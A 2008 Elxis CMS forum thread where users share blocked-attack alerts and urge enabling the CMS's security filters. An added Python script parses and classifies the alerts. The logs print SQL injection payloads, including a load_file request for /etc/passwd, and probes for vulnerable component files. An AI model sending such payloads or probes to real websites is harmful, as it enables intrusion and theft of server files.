Elxis CMS Forum
Author Topic: New session of attacks have started.  (Read 39977 times)
Sirigos
« on: August 31, 2008, 12:14:34 PM »

New attacks from several IPs have started.

There have recently been several attempts to hack websites that I manage.
Thanks to Elxis Defender and some custom work I did, all the websites were found to be SAFE after the attempts.

Here is a list of the attempts:
Elxis Defender blocked an attack to your site

ATTACKER IP ADDRESS: 118.167.16.97
Requested URI:
Code:
/?\';DECLARE @S CHAR(4000);SET @S=CAST(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 AS CHAR(4000));EXEC(@S);
DATE: 27-08-2008 09:14:38

ATTACKER IP ADDRESS: 118.167.16.97
Requested URI:
Code:
/?\';DECLARE @S CHAR(4000);SET @S=CAST(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 AS CHAR(4000));EXEC(@S);
DATE: 27-08-2008 09:14:38

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_chronocontact/excelwriter/PPS/File.php
DATE: 31-08-2008 07:20:52

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/components/com_mosmedia/media.divs.php
DATE: 31-08-2008 06:49:46

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php
DATE: 31-08-2008 03:34:14
 
ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/components/com_sitemap/sitemap.xml.php
DATE: 31-08-2008 02:03:43

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_jcs/view/history.php
DATE: 30-08-2008 23:43:20

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/components/com_smf/smf.php
DATE: 30-08-2008 23:25:28

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_mosmedia/includes/purchase.html.php
DATE: 30-08-2008 23:19:39

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/components/com_mp3_allopass/allopass-error.php
DATE: 30-08-2008 22:42:33

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/components/com_thopper/inc/responses_type.php
DATE: 30-08-2008 22:23:49

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/components/com_slideshow/admin.slideshow1.php
DATE: 30-08-2008 20:41:53

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_jcs/view/register.php
DATE: 30-08-2008 20:09:05

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_peoplebook/param.peoplebook.php
DATE: 30-08-2008 20:03:38

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/components/com_moodle/moodle.php
DATE: 30-08-2008 19:35:51

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_mosmedia/includes/credits.html.php
DATE: 30-08-2008 19:26:40

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/modules/MambWeather/Savant2/Savant2_Plugin_options.php
DATE: 30-08-2008 18:57:43

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php
DATE: 30-08-2008 18:41:11

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_jcs/jcs.function.php
DATE: 30-08-2008 17:51:06

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:
Code:
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php
DATE: 30-08-2008 16:21:40


Conclusion:
All users MUST enable Elxis Defender with ALL the filters ON (you can find the basic list of filters for Elxis Defender inside the Elxis Defender options).
Go to Tools -> Elxis Defender and fill in ALL Example Filters.

These options can protect you from almost all attempts to attack your website.
Some people will say: "Yes, OK, I will enable all this, but my website will be slower."

My answer to this question is simple: "You have the option to move your website to a better hosting provider and you will be sure that you are secure and you will not lose your data from your website".

Also, if you look at the targets of the attack attempts, they are for other CMSs, and once again I would like to say: DO NOT use modules, mambots or components that are not verified by the Elxis Team; use ONLY those from the Elxis Download Center.


*Modification to add more
« Last Edit: August 31, 2008, 03:36:12 PM by Sirigos » Logged

Ivan Trebješanin
« Reply #1 on: August 31, 2008, 02:14:34 PM »

There are multiple attacks from the same IP in your list. You should enable blocking of the attacker's IP.

I've got a snap in my finger...
Got rhythm in my walk...
nikos65
« Reply #2 on: September 04, 2008, 09:24:19 PM »

New attack!!! Safe with Elxis Defender :D

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 70.110.158.71 (blocked)
Requested URI: /index.php?option=1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--
DATE: 04-09-2008 11:12:11
Attack was logged

----
I grow old always learning
www.gr-eshop.com  | www.e-epiros.gr
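
The alert format quoted in this thread can be triaged offline, which covers both points raised in the replies: repeated hits from one IP (Reply #1) and the `char(...)`-obfuscated request (Reply #2). The following is an added example, not part of the original posts and not Elxis Defender code; the function names are hypothetical, and the sample is constructed with documentation-range IPs and URIs taken from the posts above.

```python
import re
from collections import Counter

# Constructed sample in the alert layout quoted in this thread (documentation-range IPs).
SAMPLE = """\
ATTACKER IP ADDRESS: 192.0.2.10
Requested URI:
Code:
/components/com_mosmedia/media.divs.php
DATE: 31-08-2008 06:49:46

ATTACKER IP ADDRESS: 192.0.2.10
Requested URI: /administrator/components/com_jcs/view/history.php
DATE: 30-08-2008 23:43:20

ATTACKER IP ADDRESS: 198.51.100.7 (blocked)
Requested URI: /index.php?option=1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--
DATE: 04-09-2008 11:12:11
"""

# The URI may sit on the "Requested URI:" line or under a forum "Code:" label.
ENTRY = re.compile(r"ATTACKER IP ADDRESS:[ \t]*(?P<ip>[\d.]+)[^\n]*\n"
                   r"Requested URI:[ \t]*(?:\nCode:[ \t]*\n)?(?P<uri>[^\n]*)\n"
                   r"DATE:[ \t]*(?P<date>[^\n]+)")
# Two or more numbers only, so a type declaration such as CHAR(4000) is not "decoded".
CHAR_CALL = re.compile(r"char\(\s*(\d+(?:\s*,\s*\d+)+)\s*\)", re.I)
SQL_HINT = re.compile(r"union\s+(?:all\s+)?select|declare\s+@|exec\s*\(|load_file", re.I)
PROBE = re.compile(r"^/(?:administrator/)?(?:components|modules)/[\w./-]+\.php$")

def decode_char_calls(uri):
    """Expand SQL char(n,n,...) obfuscation so the analyst sees the real string."""
    return ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in CHAR_CALL.finditer(uri)]

def parse_alerts(text):
    """Turn pasted alert text into records with a coarse request category."""
    alerts = []
    for m in ENTRY.finditer(text):
        uri = m.group("uri").strip()
        kind = ("sql-injection" if SQL_HINT.search(uri)
                else "component-probe" if PROBE.match(uri) else "other")
        alerts.append({"ip": m.group("ip"), "uri": uri, "kind": kind,
                       "date": m.group("date").strip(), "decoded": decode_char_calls(uri)})
    return alerts

def repeat_offenders(alerts, threshold=2):
    """IPs seen at least `threshold` times: candidates for IP blocking."""
    counts = Counter(a["ip"] for a in alerts)
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    print(*parse_alerts(SAMPLE), repeat_offenders(parse_alerts(SAMPLE)), sep="\n")
```

For the constructed sample, the decoded `char(...)` argument shows the request was trying to read `/etc/passwd` via `load_file`, and the only IP that crosses the repeat threshold is the one probing third-party component paths.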